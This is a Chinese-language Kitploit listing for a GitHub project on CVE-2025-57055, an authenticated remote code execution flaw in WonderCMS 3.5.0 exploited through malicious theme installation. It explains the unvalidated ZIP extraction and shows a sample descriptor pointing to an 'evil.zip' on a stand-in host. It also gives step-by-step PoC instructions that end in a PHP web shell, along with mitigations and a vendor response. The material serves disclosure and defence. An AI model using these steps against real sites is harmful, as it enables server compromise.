Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-57055 — # WonderCMS 3.5.0 认证远程代码执行(RCE)漏洞利用 针对 WonderCMS 3.5.0 的认证远程代码执行(RCE)漏洞利用,通过恶意主题安装实现。包含漏洞机制、PoC 以及面向安全测试与教育用途的缓解指南。 | Kitploit
工具/GitHubGitHub/thawphone/cve-2025-57055
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubthawphone/cve-2025-57055

CVE-2025-57055

# WonderCMS 3.5.0 认证远程代码执行(RCE)漏洞利用 针对 WonderCMS 3.5.0 的认证远程代码执行(RCE)漏洞利用,通过恶意主题安装实现。包含漏洞机制、PoC 以及面向安全测试与教育用途的缓解指南。

查看仓库
0年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-57055:WonderCMS 3.5.0 中的已认证远程代码执行

漏洞机制

WonderCMS v3.5.0 存在一个已认证远程代码执行(RCE)漏洞。

问题源于应用程序通过 JSON 描述符处理远程主题/模块安装的方式。当管理员提交引用 ZIP 压缩包的远程 JSON 文件时,其内容会被解压到可通过 Web 访问的目录(例如 /themes/)。如果该 ZIP 包含 PHP 文件,该文件即可通过 Web 访问并可能被执行。

此行为因以下原因引入 RCE 风险:

  • 对 ZIP 内容缺乏验证或清理。
  • 对从远程来源解压的文件类型没有限制。
  • 主题/插件目录可通过 Web 访问。

注意: 需要管理员认证,但默认安装会在主页上公开管理员密码,仅使用密码登录,并且未实施强认证控制。

远程模块/主题描述符的验收标准

如果提交的 JSON 描述符符合预期的 wcms-modules.json 格式,WonderCMS 将接受并尝试安装远程模块/主题。通过格式检查(并指向 ZIP 压缩包)的描述符将被获取,其压缩包内容会被解压到可通过 Web 访问的目录(例如 /themes/<name>/),而不会进一步验证文件类型。

示例描述符:

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

概念验证(PoC)

警告:请勿在生产系统上运行。仅限在授权的测试环境中使用。

  1. 从默认 WonderCMS 安装的公开主页上获取管理员密码。

  2. 登录管理面板。

  3. 导航到主题安装部分。

  4. 提供恶意 JSON 描述符的 URL(例如,托管在攻击者控制的服务器上)。

  5. 开始安装。服务器将:

  • 获取描述符。
  • 下载指定的 ZIP 压缩包。
  1. 安装下载的恶意主题。

  2. 访问提取出的 PHP shell(例如,http://target.com/themes/<Theme_Name>/shell.php)以执行任意命令。

(注意: 仅可在受控测试环境中执行这些步骤。未经授权在真实系统上利用此漏洞是违法的。)

厂商回应

  • 该漏洞已于 2025 年 7 月报告给 WonderCMS 维护人员。

  • 维护人员确认了该报告,但指出在他们看来,此行为对管理员来说是可接受的。

缓解指南

为减少暴露面:

  • 将远程安装功能限制为可信来源(例如仅限 GitHub)。
  • 在解压前验证并清理 ZIP 内容。
  • 强化认证:
    • 安装后隐藏管理员密码。
    • 强制使用用户名/密码登录。
    • 启用多因素认证(如果可用)。
  • 通过服务器配置阻止访问 themes/ 或 plugins/ 内的可执行文件。

参考资料

  • WonderCMS GitHub
  • OWASP A05:2021 – 安全配置错误
  • CWE-434 – 危险类型文件的不受限制上传

免责声明

此信息仅供防御性安全研究和教育目的使用。在测试或披露漏洞之前,请务必获得适当授权。

下载工具